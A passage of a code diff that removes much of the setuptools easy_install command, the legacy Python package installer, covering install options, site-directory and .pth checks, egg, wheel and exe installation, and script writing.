WorkingSet, DistributionNotFound, - VersionConflict, DEVELOP_DIST, -) -import pkg_resources - -# Turn on PEP440Warnings -warnings.filterwarnings("default", category=pkg_resources.PEP440Warning) - -__all__ = [ - 'samefile', 'easy_install', 'PthDistributions', 'extract_wininst_cfg', - 'get_exe_prefixes', -] - - -def is_64bit(): - return struct.calcsize("P") == 8 - - -def samefile(p1, p2): - """ - Determine if two paths reference the same file. - - Augments os.path.samefile to work on Windows and - suppresses errors if the path doesn't exist. 
- """ - both_exist = os.path.exists(p1) and os.path.exists(p2) - use_samefile = hasattr(os.path, 'samefile') and both_exist - if use_samefile: - return os.path.samefile(p1, p2) - norm_p1 = os.path.normpath(os.path.normcase(p1)) - norm_p2 = os.path.normpath(os.path.normcase(p2)) - return norm_p1 == norm_p2 - - -def _to_bytes(s): - return s.encode('utf8') - - -def isascii(s): - try: - s.encode('ascii') - return True - except UnicodeError: - return False - - -def _one_liner(text): - return textwrap.dedent(text).strip().replace('\n', '; ') - - -class easy_install(Command): - """Manage a download/build/install process""" - description = "Find/get/install Python packages" - command_consumes_arguments = True - - user_options = [ - ('prefix=', None, "installation prefix"), - ("zip-ok", "z", "install package as a zipfile"), - ("multi-version", "m", "make apps have to require() a version"), - ("upgrade", "U", "force upgrade (searches PyPI for latest versions)"), - ("install-dir=", "d", "install package to DIR"), - ("script-dir=", "s", "install scripts to DIR"), - ("exclude-scripts", "x", "Don't install scripts"), - ("always-copy", "a", "Copy all needed packages to install dir"), - ("index-url=", "i", "base URL of Python Package Index"), - ("find-links=", "f", "additional URL(s) to search for packages"), - ("build-directory=", "b", - "download/extract/build in DIR; keep the results"), - ('optimize=', 'O', - "also compile with optimization: -O1 for \"python -O\", " - "-O2 for \"python -OO\", and -O0 to disable [default: -O0]"), - ('record=', None, - "filename in which to record list of installed files"), - ('always-unzip', 'Z', "don't install as a zipfile, no matter what"), - ('site-dirs=', 'S', "list of directories where .pth files work"), - ('editable', 'e', "Install specified packages in editable form"), - ('no-deps', 'N', "don't install dependencies"), - ('allow-hosts=', 'H', "pattern(s) that hostnames must match"), - ('local-snapshots-ok', 'l', - "allow building eggs from local checkouts"), - ('version', None, "print version information and exit"), - ('no-find-links', None, - "Don't load find-links defined in packages being installed"), - ('user', None, "install in user site-package '%s'" % site.USER_SITE) - ] - boolean_options = [ - 'zip-ok', 'multi-version', 'exclude-scripts', 'upgrade', 'always-copy', - 'editable', - 'no-deps', 'local-snapshots-ok', 'version', - 'user' - ] - - negative_opt = {'always-unzip': 'zip-ok'} - create_index = PackageIndex - - def initialize_options(self): - # the --user option seems to be an opt-in one, - # so the default should be False. 
- self.user = 0 - self.zip_ok = self.local_snapshots_ok = None - self.install_dir = self.script_dir = self.exclude_scripts = None - self.index_url = None - self.find_links = None - self.build_directory = None - self.args = None - self.optimize = self.record = None - self.upgrade = self.always_copy = self.multi_version = None - self.editable = self.no_deps = self.allow_hosts = None - self.root = self.prefix = self.no_report = None - self.version = None - self.install_purelib = None # for pure module distributions - self.install_platlib = None # non-pure (dists w/ extensions) - self.install_headers = None # for C/C++ headers - self.install_lib = None # set to either purelib or platlib - self.install_scripts = None - self.install_data = None - self.install_base = None - self.install_platbase = None - if site.ENABLE_USER_SITE: - self.install_userbase = site.USER_BASE - self.install_usersite = site.USER_SITE - else: - self.install_userbase = None - self.install_usersite = None - self.no_find_links = None - - # Options not specifiable via command line - self.package_index = None - self.pth_file = self.always_copy_from = None - self.site_dirs = None - self.installed_projects = {} - # Always read easy_install options, even if we are subclassed, or have - # an independent instance created. This ensures that defaults will - # always come from the standard configuration file(s)' "easy_install" - # section, even if this is a "develop" or "install" command, or some - # other embedding. - self._dry_run = None - self.verbose = self.distribution.verbose - self.distribution._set_command_options( - self, self.distribution.get_option_dict('easy_install') - ) - - def delete_blockers(self, blockers): - extant_blockers = ( - filename for filename in blockers - if os.path.exists(filename) or os.path.islink(filename) - ) - list(map(self._delete_path, extant_blockers)) - - def _delete_path(self, path): - log.info("Deleting %s", path) - if self.dry_run: - return - - is_tree = os.path.isdir(path) and not os.path.islink(path) - remover = rmtree if is_tree else os.unlink - remover(path) - - @staticmethod - def _render_version(): - """ - Render the Setuptools version and installation details, then exit. 
- """ - ver = '{}.{}'.format(*sys.version_info) - dist = get_distribution('setuptools') - tmpl = 'setuptools {dist.version} from {dist.location} (Python {ver})' - print(tmpl.format(**locals())) - raise SystemExit() - - def finalize_options(self): # noqa: C901 # is too complex (25) # FIXME - self.version and self._render_version() - - py_version = sys.version.split()[0] - prefix, exec_prefix = get_config_vars('prefix', 'exec_prefix') - - self.config_vars = { - 'dist_name': self.distribution.get_name(), - 'dist_version': self.distribution.get_version(), - 'dist_fullname': self.distribution.get_fullname(), - 'py_version': py_version, - 'py_version_short': py_version[0:3], - 'py_version_nodot': py_version[0] + py_version[2], - 'sys_prefix': prefix, - 'prefix': prefix, - 'sys_exec_prefix': exec_prefix, - 'exec_prefix': exec_prefix, - # Only python 3.2+ has abiflags - 'abiflags': getattr(sys, 'abiflags', ''), - } - - if site.ENABLE_USER_SITE: - self.config_vars['userbase'] = self.install_userbase - self.config_vars['usersite'] = self.install_usersite - - elif self.user: - log.warn("WARNING: The user site-packages directory is disabled.") - - self._fix_install_dir_for_user_site() - - self.expand_basedirs() - self.expand_dirs() - - self._expand( - 'install_dir', 'script_dir', 'build_directory', - 'site_dirs', - ) - # If a non-default installation directory was specified, default the - # script directory to match it. - if self.script_dir is None: - self.script_dir = self.install_dir - - if self.no_find_links is None: - self.no_find_links = False - - # Let install_dir get set by install_lib command, which in turn - # gets its info from the install command, and takes into account - # --prefix and --home and all that other crud. - self.set_undefined_options( - 'install_lib', ('install_dir', 'install_dir') - ) - # Likewise, set default script_dir from 'install_scripts.install_dir' - self.set_undefined_options( - 'install_scripts', ('install_dir', 'script_dir') - ) - - if self.user and self.install_purelib: - self.install_dir = self.install_purelib - self.script_dir = self.install_scripts - # default --record from the install command - self.set_undefined_options('install', ('record', 'record')) - # Should this be moved to the if statement below? 
It's not used - # elsewhere - normpath = map(normalize_path, sys.path) - self.all_site_dirs = get_site_dirs() - if self.site_dirs is not None: - site_dirs = [ - os.path.expanduser(s.strip()) for s in - self.site_dirs.split(',') - ] - for d in site_dirs: - if not os.path.isdir(d): - log.warn("%s (in --site-dirs) does not exist", d) - elif normalize_path(d) not in normpath: - raise DistutilsOptionError( - d + " (in --site-dirs) is not on sys.path" - ) - else: - self.all_site_dirs.append(normalize_path(d)) - if not self.editable: - self.check_site_dir() - self.index_url = self.index_url or "https://pypi.org/simple/" - self.shadow_path = self.all_site_dirs[:] - for path_item in self.install_dir, normalize_path(self.script_dir): - if path_item not in self.shadow_path: - self.shadow_path.insert(0, path_item) - - if self.allow_hosts is not None: - hosts = [s.strip() for s in self.allow_hosts.split(',')] - else: - hosts = ['*'] - if self.package_index is None: - self.package_index = self.create_index( - self.index_url, search_path=self.shadow_path, hosts=hosts, - ) - self.local_index = Environment(self.shadow_path + sys.path) - - if self.find_links is not None: - if isinstance(self.find_links, str): - self.find_links = self.find_links.split() - else: - self.find_links = [] - if self.local_snapshots_ok: - self.package_index.scan_egg_links(self.shadow_path + sys.path) - if not self.no_find_links: - self.package_index.add_find_links(self.find_links) - self.set_undefined_options('install_lib', ('optimize', 'optimize')) - if not isinstance(self.optimize, int): - try: - self.optimize = int(self.optimize) - if not (0 <= self.optimize <= 2): - raise ValueError - except ValueError as e: - raise DistutilsOptionError( - "--optimize must be 0, 1, or 2" - ) from e - - if self.editable and not self.build_directory: - raise DistutilsArgError( - "Must specify a build directory (-b) when using --editable" - ) - if not self.args: - raise DistutilsArgError( - "No urls, filenames, or requirements specified (see --help)") - - self.outputs = [] - - def _fix_install_dir_for_user_site(self): - """ - Fix the install_dir if "--user" was used. 
- """ - if not self.user or not site.ENABLE_USER_SITE: - return - - self.create_home_path() - if self.install_userbase is None: - msg = "User base directory is not specified" - raise DistutilsPlatformError(msg) - self.install_base = self.install_platbase = self.install_userbase - scheme_name = os.name.replace('posix', 'unix') + '_user' - self.select_scheme(scheme_name) - - def _expand_attrs(self, attrs): - for attr in attrs: - val = getattr(self, attr) - if val is not None: - if os.name == 'posix' or os.name == 'nt': - val = os.path.expanduser(val) - val = subst_vars(val, self.config_vars) - setattr(self, attr, val) - - def expand_basedirs(self): - """Calls `os.path.expanduser` on install_base, install_platbase and - root.""" - self._expand_attrs(['install_base', 'install_platbase', 'root']) - - def expand_dirs(self): - """Calls `os.path.expanduser` on install dirs.""" - dirs = [ - 'install_purelib', - 'install_platlib', - 'install_lib', - 'install_headers', - 'install_scripts', - 'install_data', - ] - self._expand_attrs(dirs) - - def run(self, show_deprecation=True): - if show_deprecation: - self.announce( - "WARNING: The easy_install command is deprecated " - "and will be removed in a future version.", - log.WARN, - ) - if self.verbose != self.distribution.verbose: - log.set_verbosity(self.verbose) - try: - for spec in self.args: - self.easy_install(spec, not self.no_deps) - if self.record: - outputs = self.outputs - if self.root: # strip any package prefix - root_len = len(self.root) - for counter in range(len(outputs)): - outputs[counter] = outputs[counter][root_len:] - from distutils import file_util - - self.execute( - file_util.write_file, (self.record, outputs), - "writing list of installed files to '%s'" % - self.record - ) - self.warn_deprecated_options() - finally: - log.set_verbosity(self.distribution.verbose) - - def pseudo_tempname(self): - """Return a pseudo-tempname base in the install directory. - This code is intentionally naive; if a malicious party can write to - the target directory you're already in deep doodoo. - """ - try: - pid = os.getpid() - except Exception: - pid = random.randint(0, sys.maxsize) - return os.path.join(self.install_dir, "test-easy-install-%s" % pid) - - def warn_deprecated_options(self): - pass - - def check_site_dir(self): # noqa: C901 # is too complex (12) # FIXME - """Verify that self.install_dir is .pth-capable dir, if needed""" - - instdir = normalize_path(self.install_dir) - pth_file = os.path.join(instdir, 'easy-install.pth') - - if not os.path.exists(instdir): - try: - os.makedirs(instdir) - except (OSError, IOError): - self.cant_write_to_target() - - # Is it a configured, PYTHONPATH, implicit, or explicit site dir? - is_site_dir = instdir in self.all_site_dirs - - if not is_site_dir and not self.multi_version: - # No? 
Then directly test whether it does .pth file processing - is_site_dir = self.check_pth_processing() - else: - # make sure we can write to target dir - testfile = self.pseudo_tempname() + '.write-test' - test_exists = os.path.exists(testfile) - try: - if test_exists: - os.unlink(testfile) - open(testfile, 'w').close() - os.unlink(testfile) - except (OSError, IOError): - self.cant_write_to_target() - - if not is_site_dir and not self.multi_version: - # Can't install non-multi to non-site dir with easy_install - pythonpath = os.environ.get('PYTHONPATH', '') - log.warn(self.__no_default_msg, self.install_dir, pythonpath) - - if is_site_dir: - if self.pth_file is None: - self.pth_file = PthDistributions(pth_file, self.all_site_dirs) - else: - self.pth_file = None - - if self.multi_version and not os.path.exists(pth_file): - self.pth_file = None # don't create a .pth file - self.install_dir = instdir - - __cant_write_msg = textwrap.dedent(""" - can't create or remove files in install directory - - The following error occurred while trying to add or remove files in the - installation directory: - - %s - - The installation directory you specified (via --install-dir, --prefix, or - the distutils default setting) was: - - %s - """).lstrip() # noqa - - __not_exists_id = textwrap.dedent(""" - This directory does not currently exist. Please create it and try again, or - choose a different installation directory (using the -d or --install-dir - option). - """).lstrip() # noqa - - __access_msg = textwrap.dedent(""" - Perhaps your account does not have write access to this directory? If the - installation directory is a system-owned directory, you may need to sign in - as the administrator or "root" account. If you do not have administrative - access to this machine, you may wish to choose a different installation - directory, preferably one that is listed in your PYTHONPATH environment - variable. - - For information on other options, you may wish to consult the - documentation at: - - https://setuptools.readthedocs.io/en/latest/deprecated/easy_install.html - - Please make the appropriate changes for your system and try again. - """).lstrip() # noqa - - def cant_write_to_target(self): - msg = self.__cant_write_msg % (sys.exc_info()[1], self.install_dir,) - - if not os.path.exists(self.install_dir): - msg += '\n' + self.__not_exists_id - else: - msg += '\n' + self.__access_msg - raise DistutilsError(msg) - - def check_pth_processing(self): - """Empirically verify whether .pth files are supported in inst. 
dir""" - instdir = self.install_dir - log.info("Checking .pth file support in %s", instdir) - pth_file = self.pseudo_tempname() + ".pth" - ok_file = pth_file + '.ok' - ok_exists = os.path.exists(ok_file) - tmpl = _one_liner(""" - import os - f = open({ok_file!r}, 'w') - f.write('OK') - f.close() - """) + '\n' - try: - if ok_exists: - os.unlink(ok_file) - dirname = os.path.dirname(ok_file) - os.makedirs(dirname, exist_ok=True) - f = open(pth_file, 'w') - except (OSError, IOError): - self.cant_write_to_target() - else: - try: - f.write(tmpl.format(**locals())) - f.close() - f = None - executable = sys.executable - if os.name == 'nt': - dirname, basename = os.path.split(executable) - alt = os.path.join(dirname, 'pythonw.exe') - use_alt = ( - basename.lower() == 'python.exe' and - os.path.exists(alt) - ) - if use_alt: - # use pythonw.exe to avoid opening a console window - executable = alt - - from distutils.spawn import spawn - - spawn([executable, '-E', '-c', 'pass'], 0) - - if os.path.exists(ok_file): - log.info( - "TEST PASSED: %s appears to support .pth files", - instdir - ) - return True - finally: - if f: - f.close() - if os.path.exists(ok_file): - os.unlink(ok_file) - if os.path.exists(pth_file): - os.unlink(pth_file) - if not self.multi_version: - log.warn("TEST FAILED: %s does NOT support .pth files", instdir) - return False - - def install_egg_scripts(self, dist): - """Write all the scripts for `dist`, unless scripts are excluded""" - if not self.exclude_scripts and dist.metadata_isdir('scripts'): - for script_name in dist.metadata_listdir('scripts'): - if dist.metadata_isdir('scripts/' + script_name): - # The "script" is a directory, likely a Python 3 - # __pycache__ directory, so skip it. - continue - self.install_script( - dist, script_name, - dist.get_metadata('scripts/' + script_name) - ) - self.install_wrapper_scripts(dist) - - def add_output(self, path): - if os.path.isdir(path): - for base, dirs, files in os.walk(path): - for filename in files: - self.outputs.append(os.path.join(base, filename)) - else: - self.outputs.append(path) - - def not_editable(self, spec): - if self.editable: - raise DistutilsArgError( - "Invalid argument %r: you can't use filenames or URLs " - "with --editable (except via the --find-links option)." 
- % (spec,) - ) - - def check_editable(self, spec): - if not self.editable: - return - - if os.path.exists(os.path.join(self.build_directory, spec.key)): - raise DistutilsArgError( - "%r already exists in %s; can't do a checkout there" % - (spec.key, self.build_directory) - ) - - @contextlib.contextmanager - def _tmpdir(self): - tmpdir = tempfile.mkdtemp(prefix=u"easy_install-") - try: - # cast to str as workaround for #709 and #710 and #712 - yield str(tmpdir) - finally: - os.path.exists(tmpdir) and rmtree(tmpdir) - - def easy_install(self, spec, deps=False): - with self._tmpdir() as tmpdir: - if not isinstance(spec, Requirement): - if URL_SCHEME(spec): - # It's a url, download it to tmpdir and process - self.not_editable(spec) - dl = self.package_index.download(spec, tmpdir) - return self.install_item(None, dl, tmpdir, deps, True) - - elif os.path.exists(spec): - # Existing file or directory, just process it directly - self.not_editable(spec) - return self.install_item(None, spec, tmpdir, deps, True) - else: - spec = parse_requirement_arg(spec) - - self.check_editable(spec) - dist = self.package_index.fetch_distribution( - spec, tmpdir, self.upgrade, self.editable, - not self.always_copy, self.local_index - ) - if dist is None: - msg = "Could not find suitable distribution for %r" % spec - if self.always_copy: - msg += " (--always-copy skips system and development eggs)" - raise DistutilsError(msg) - elif dist.precedence == DEVELOP_DIST: - # .egg-info dists don't need installing, just process deps - self.process_distribution(spec, dist, deps, "Using") - return dist - else: - return self.install_item(spec, dist.location, tmpdir, deps) - - def install_item(self, spec, download, tmpdir, deps, install_needed=False): - - # Installation is also needed if file in tmpdir or is not an egg - install_needed = install_needed or self.always_copy - install_needed = install_needed or os.path.dirname(download) == tmpdir - install_needed = install_needed or not download.endswith('.egg') - install_needed = install_needed or ( - self.always_copy_from is not None and - os.path.dirname(normalize_path(download)) == - normalize_path(self.always_copy_from) - ) - - if spec and not install_needed: - # at this point, we know it's a local .egg, we just don't know if - # it's already installed. - for dist in self.local_index[spec.project_name]: - if dist.location == download: - break - else: - install_needed = True # it's not in the local index - - log.info("Processing %s", os.path.basename(download)) - - if install_needed: - dists = self.install_eggs(spec, download, tmpdir) - for dist in dists: - self.process_distribution(spec, dist, deps) - else: - dists = [self.egg_distribution(download)] - self.process_distribution(spec, dists[0], deps, "Using") - - if spec is not None: - for dist in dists: - if dist in spec: - return dist - - def select_scheme(self, name): - """Sets the install directories by applying the install schemes.""" - # it's the caller's problem if they supply a bad name! 
- scheme = INSTALL_SCHEMES[name] - for key in SCHEME_KEYS: - attrname = 'install_' + key - if getattr(self, attrname) is None: - setattr(self, attrname, scheme[key]) - - # FIXME: 'easy_install.process_distribution' is too complex (12) - def process_distribution( # noqa: C901 - self, requirement, dist, deps=True, *info, - ): - self.update_pth(dist) - self.package_index.add(dist) - if dist in self.local_index[dist.key]: - self.local_index.remove(dist) - self.local_index.add(dist) - self.install_egg_scripts(dist) - self.installed_projects[dist.key] = dist - log.info(self.installation_report(requirement, dist, *info)) - if (dist.has_metadata('dependency_links.txt') and - not self.no_find_links): - self.package_index.add_find_links( - dist.get_metadata_lines('dependency_links.txt') - ) - if not deps and not self.always_copy: - return - elif requirement is not None and dist.key != requirement.key: - log.warn("Skipping dependencies for %s", dist) - return # XXX this is not the distribution we were looking for - elif requirement is None or dist not in requirement: - # if we wound up with a different version, resolve what we've got - distreq = dist.as_requirement() - requirement = Requirement(str(distreq)) - log.info("Processing dependencies for %s", requirement) - try: - distros = WorkingSet([]).resolve( - [requirement], self.local_index, self.easy_install - ) - except DistributionNotFound as e: - raise DistutilsError(str(e)) from e - except VersionConflict as e: - raise DistutilsError(e.report()) from e - if self.always_copy or self.always_copy_from: - # Force all the relevant distros to be copied or activated - for dist in distros: - if dist.key not in self.installed_projects: - self.easy_install(dist.as_requirement()) - log.info("Finished processing dependencies for %s", requirement) - - def should_unzip(self, dist): - if self.zip_ok is not None: - return not self.zip_ok - if dist.has_metadata('not-zip-safe'): - return True - if not dist.has_metadata('zip-safe'): - return True - return False - - def maybe_move(self, spec, dist_filename, setup_base): - dst = os.path.join(self.build_directory, spec.key) - if os.path.exists(dst): - msg = ( - "%r already exists in %s; build directory %s will not be kept" - ) - log.warn(msg, spec.key, self.build_directory, setup_base) - return setup_base - if os.path.isdir(dist_filename): - setup_base = dist_filename - else: - if os.path.dirname(dist_filename) == setup_base: - os.unlink(dist_filename) # get it out of the tmp dir - contents = os.listdir(setup_base) - if len(contents) == 1: - dist_filename = os.path.join(setup_base, contents[0]) - if os.path.isdir(dist_filename): - # if the only thing there is a directory, move it instead - setup_base = dist_filename - ensure_directory(dst) - shutil.move(setup_base, dst) - return dst - - def install_wrapper_scripts(self, dist): - if self.exclude_scripts: - return - for args in ScriptWriter.best().get_args(dist): - self.write_script(*args) - - def install_script(self, dist, script_name, script_text, dev_path=None): - """Generate a legacy script wrapper and install it""" - spec = str(dist.as_requirement()) - is_script = is_python_script(script_text, script_name) - - if is_script: - body = self._load_template(dev_path) % locals() - script_text = ScriptWriter.get_header(script_text) + body - self.write_script(script_name, _to_bytes(script_text), 'b') - - @staticmethod - def _load_template(dev_path): - """ - There are a couple of template scripts in the package. This - function loads one of them and prepares it for use. 
- """ - # See https://github.com/pypa/setuptools/issues/134 for info - # on script file naming and downstream issues with SVR4 - name = 'script.tmpl' - if dev_path: - name = name.replace('.tmpl', ' (dev).tmpl') - - raw_bytes = resource_string('setuptools', name) - return raw_bytes.decode('utf-8') - - def write_script(self, script_name, contents, mode="t", blockers=()): - """Write an executable file to the scripts directory""" - self.delete_blockers( # clean up old .py/.pyw w/o a script - [os.path.join(self.script_dir, x) for x in blockers] - ) - log.info("Installing %s script to %s", script_name, self.script_dir) - target = os.path.join(self.script_dir, script_name) - self.add_output(target) - - if self.dry_run: - return - - mask = current_umask() - ensure_directory(target) - if os.path.exists(target): - os.unlink(target) - with open(target, "w" + mode) as f: - f.write(contents) - chmod(target, 0o777 - mask) - - def install_eggs(self, spec, dist_filename, tmpdir): - # .egg dirs or files are already built, so just return them - installer_map = { - '.egg': self.install_egg, - '.exe': self.install_exe, - '.whl': self.install_wheel, - } - try: - install_dist = installer_map[ - dist_filename.lower()[-4:] - ] - except KeyError: - pass - else: - return [install_dist(dist_filename, tmpdir)] - - # Anything else, try to extract and build - setup_base = tmpdir - if os.path.isfile(dist_filename) and not dist_filename.endswith('.py'): - unpack_archive(dist_filename, tmpdir, self.unpack_progress) - elif os.path.isdir(dist_filename): - setup_base = os.path.abspath(dist_filename) - - if (setup_base.startswith(tmpdir) # something we downloaded - and self.build_directory and spec is not None): - setup_base = self.maybe_move(spec, dist_filename, setup_base) - - # Find the setup.py file - setup_script = os.path.join(setup_base, 'setup.py') - - if not os.path.exists(setup_script): - setups = glob(os.path.join(setup_base, '*', 'setup.py')) - if not setups: - raise DistutilsError( - "Couldn't find a setup script in %s" % - os.path.abspath(dist_filename) - ) - if len(setups) > 1: - raise DistutilsError( - "Multiple setup scripts in %s" % - os.path.abspath(dist_filename) - ) - setup_script = setups[0] - - # Now run it, and return the result - if self.editable: - log.info(self.report_editable(spec, setup_script)) - return [] - else: - return self.build_and_install(setup_script, setup_base) - - def egg_distribution(self, egg_path): - if os.path.isdir(egg_path): - metadata = PathMetadata(egg_path, os.path.join(egg_path, - 'EGG-INFO')) - else: - metadata = EggMetadata(zipimport.zipimporter(egg_path)) - return Distribution.from_filename(egg_path, metadata=metadata) - - # FIXME: 'easy_install.install_egg' is too complex (11) - def install_egg(self, egg_path, tmpdir): # noqa: C901 - destination = os.path.join( - self.install_dir, - os.path.basename(egg_path), - ) - destination = os.path.abspath(destination) - if not self.dry_run: - ensure_directory(destination) - - dist = self.egg_distribution(egg_path) - if not samefile(egg_path, destination): - if os.path.isdir(destination) and not os.path.islink(destination): - dir_util.remove_tree(destination, dry_run=self.dry_run) - elif os.path.exists(destination): - self.execute( - os.unlink, - (destination,), - "Removing " + destination, - ) - try: - new_dist_is_zipped = False - if os.path.isdir(egg_path): - if egg_path.startswith(tmpdir): - f, m = shutil.move, "Moving" - else: - f, m = shutil.copytree, "Copying" - elif self.should_unzip(dist): - self.mkpath(destination) - f, m = 
self.unpack_and_compile, "Extracting" - else: - new_dist_is_zipped = True - if egg_path.startswith(tmpdir): - f, m = shutil.move, "Moving" - else: - f, m = shutil.copy2, "Copying" - self.execute( - f, - (egg_path, destination), - (m + " %s to %s") % ( - os.path.basename(egg_path), - os.path.dirname(destination) - ), - ) - update_dist_caches( - destination, - fix_zipimporter_caches=new_dist_is_zipped, - ) - except Exception: - update_dist_caches(destination, fix_zipimporter_caches=False) - raise - - self.add_output(destination) - return self.egg_distribution(destination) - - def install_exe(self, dist_filename, tmpdir): - # See if it's valid, get data - cfg = extract_wininst_cfg(dist_filename) - if cfg is None: - raise DistutilsError( - "%s is not a valid distutils Windows .exe" % dist_filename - ) - # Create a dummy distribution object until we build the real distro - dist = Distribution( - None, - project_name=cfg.get('metadata', 'name'), - version=cfg.get('metadata', 'version'), platform=get_platform(), - ) - - # Convert the .exe to an unpacked egg - egg_path = os.path.join(tmpdir, dist.egg_name() + '.egg') - dist.location = egg_path - egg_tmp = egg_path + '.tmp' - _egg_info = os.path.join(egg_tmp, 'EGG-INFO') - pkg_inf = os.path.join(_egg_info, 'PKG-INFO') - ensure_directory(pkg_inf) # make sure EGG-INFO dir exists - dist._provider = PathMetadata(egg_tmp, _egg_info) # XXX - self.exe_to_egg(dist_filename, egg_tmp) - - # Write EGG-INFO/PKG-INFO - if not os.path.exists(pkg_inf): - f = open(pkg_inf, 'w') - f.write('Metadata-Version: 1.0\n') - for k, v in cfg.items('metadata'): - if k != 'target_version': - f.write('%s: %s\n' % (k.replace('_', '-').title(), v)) - f.close() - script_dir = os.path.join(_egg_info, 'scripts') - # delete entry-point scripts to avoid duping - self.delete_blockers([ - os.path.join(script_dir, args[0]) - for args in ScriptWriter.get_args(dist) - ]) - # Build .egg file from tmpdir - bdist_egg.make_zipfile( - egg_path, egg_tmp, verbose=self.verbose, dry_run=self.dry_run, - ) - # install the .egg - return self.install_egg(egg_path, tmpdir) - - # FIXME: 'easy_install.exe_to_egg' is too complex (12) - def exe_to_egg(self, dist_filename, egg_tmp): # noqa: C901 - """Extract a bdist_wininst to the directories an egg would use""" - # Check for .pth file and set up prefix translations - prefixes = get_exe_prefixes(dist_filename) - to_compile = [] - native_libs = [] - top_level = {} - - def process(src, dst): - s = src.lower() - for old, new in prefixes: - if s.startswith(old): - src = new + src[len(old):] - parts = src.split('/') - dst = os.path.join(egg_tmp, *parts) - dl = dst.lower() - if dl.endswith('.pyd') or dl.endswith('.dll'): - parts[-1] = bdist_egg.strip_module(parts[-1]) - top_level[os.path.splitext(parts[0])[0]] = 1 - native_libs.append(src) - elif dl.endswith('.py') and old != 'SCRIPTS/': - top_level[os.path.splitext(parts[0])[0]] = 1 - to_compile.append(dst) - return dst - if not src.endswith('.pth'): - log.warn("WARNING: can't process %s", src) - return None - - # extract, tracking .pyd/.dll->native_libs and .py -> to_compile - unpack_archive(dist_filename, egg_tmp, process) - stubs = [] - for res in native_libs: - if res.lower().endswith('.pyd'): # create stubs for .pyd's - parts = res.split('/') - resource = parts[-1] - parts[-1] = bdist_egg.strip_module(parts[-1]) + '.py' - pyfile = os.path.join(egg_tmp, *parts) - to_compile.append(pyfile) - stubs.append(pyfile) - bdist_egg.write_stub(resource, pyfile) - self.byte_compile(to_compile) # compile .py's - 
bdist_egg.write_safety_flag( - os.path.join(egg_tmp, 'EGG-INFO'), - bdist_egg.analyze_egg(egg_tmp, stubs)) # write zip-safety flag - - for name in 'top_level', 'native_libs': - if locals()[name]: - txt = os.path.join(egg_tmp, 'EGG-INFO', name + '.txt') - if not os.path.exists(txt): - f = open(txt, 'w') - f.write('\n'.join(locals()[name]) + '\n') - f.close() - - def install_wheel(self, wheel_path, tmpdir): - wheel = Wheel(wheel_path) - assert wheel.is_compatible() - destination = os.path.join(self.install_dir, wheel.egg_name()) - destination = os.path.abspath(destination) - if not self.dry_run: - ensure_directory(destination) - if os.path.isdir(destination) and not os.path.islink(destination): - dir_util.remove_tree(destination, dry_run=self.dry_run) - elif os.path.exists(destination): - self.execute( - os.unlink, - (destination,), - "Removing " + destination, - ) - try: - self.execute( - wheel.install_as_egg, - (destination,), - ("Installing %s to %s") % ( - os.path.basename(wheel_path), - os.path.dirname(destination) - ), - ) - finally: - update_dist_caches(destination, fix_zipimporter_caches=False) - self.add_output(destination) - return self.egg_distribution(destination) - - __mv_warning = textwrap.dedent(""" - Because this distribution was installed --multi-version, before you can - import modules from this package in an application, you will need to - 'import pkg_resources' and then use a 'require()' call similar to one of - these examples, in order to select the desired version: - - pkg_resources.require("%(name)s") # latest installed version - pkg_resources.require("%(name)s==%(version)s") # this exact version - pkg_resources.require("%(name)s>=%(version)s") # this version or higher - """).lstrip() # noqa - - __id_warning = textwrap.dedent(""" - Note also that the installation directory must be on sys.path at runtime for - this to work. (e.g. by being the application's script directory, by being on - PYTHONPATH, or by being added to sys.path by your code.) - """) # noqa - - def installation_report(self, req, dist, what="Installed"): - """Helpful installation message for display to package users""" - msg = "\n%(what)s %(eggloc)s%(extras)s" - if self.multi_version and not self.no_report: - msg += '\n' + self.__mv_warning - if self.install_dir not in map(normalize_path, sys.path): - msg += '\n' + self.__id_warning - - eggloc = dist.location - name = dist.project_name - version = dist.version - extras = '' # TODO: self.report_extras(req, dist) - return msg % locals() - - __editable_msg = textwrap.dedent(""" - Extracted editable version of %(spec)s to %(dirname)s - - If it uses setuptools in its setup script, you can activate it in - "development" mode by going to that directory and running:: - - %(python)s setup.py develop - - See the setuptools documentation for the "develop" command for more info. 
- """).lstrip() # noqa - - def report_editable(self, spec, setup_script): - dirname = os.path.dirname(setup_script) - python = sys.executable - return '\n' + self.__editable_msg % locals() - - def run_setup(self, setup_script, setup_base, args): - sys.modules.setdefault('distutils.command.bdist_egg', bdist_egg) - sys.modules.setdefault('distutils.command.egg_info', egg_info) - - args = list(args) - if self.verbose > 2: - v = 'v' * (self.verbose - 1) - args.insert(0, '-' + v) - elif self.verbose < 2: - args.insert(0, '-q') - if self.dry_run: - args.insert(0, '-n') - log.info( - "Running %s %s", setup_script[len(setup_base) + 1:], ' '.join(args) - ) - try: - run_setup(setup_script, args) - except SystemExit as v: - raise DistutilsError( - "Setup script exited with %s" % (v.args[0],) - ) from v - - def build_and_install(self, setup_script, setup_base): - args = ['bdist_egg', '--dist-dir'] - - dist_dir = tempfile.mkdtemp( - prefix='egg-dist-tmp-', dir=os.path.dirname(setup_script) - ) - try: - self._set_fetcher_options(os.path.dirname(setup_script)) - args.append(dist_dir) - - self.run_setup(setup_script, setup_base, args) - all_eggs = Environment([dist_dir]) - eggs = [] - for key in all_eggs: - for dist in all_eggs[key]: - eggs.append(self.install_egg(dist.location, setup_base)) - if not eggs and not self.dry_run: - log.warn("No eggs found in %s (setup script problem?)", - dist_dir) - return eggs - finally: - rmtree(dist_dir) - log.set_verbosity(self.verbose) # restore our log verbosity - - def _set_fetcher_options(self, base): - """ - When easy_install is about to run bdist_egg on a source dist, that - source dist might have 'setup_requires' directives, requiring - additional fetching. Ensure the fetcher options given to easy_install - are available to that command as well. - """ - # find the fetch options from easy_install and write them out - # to the setup.cfg file. - ei_opts = self.distribution.get_option_dict('easy_install').copy() - fetch_directives = ( - 'find_links', 'site_dirs', 'index_url', 'optimize', 'allow_hosts', - ) - fetch_options = {} - for key, val in ei_opts.items(): - if key not in fetch_directives: - continue - fetch_options[key] = val[1] - # create a settings dictionary suitable for `edit_config` - settings = dict(easy_install=fetch_options) - cfg_filename = os.path.join(base, 'setup.cfg') - setopt.edit_config(cfg_filename, settings) - - def update_pth(self, dist): # noqa: C901 # is too complex (11) # FIXME - if self.pth_file is None: - return - - for d in self.pth_file[dist.key]: # drop old entries - if not self.multi_version and d.location == dist.location: - continue - - log.info("Removing %s from easy-install.pth file", d) - self.pth_file.remove(d) - if d.location in self.shadow_path: - self.shadow_path.remove(d.location) - - if not self.multi_version: - if dist.location in self.pth_file.paths: - log.info( - "%s is already the active version in 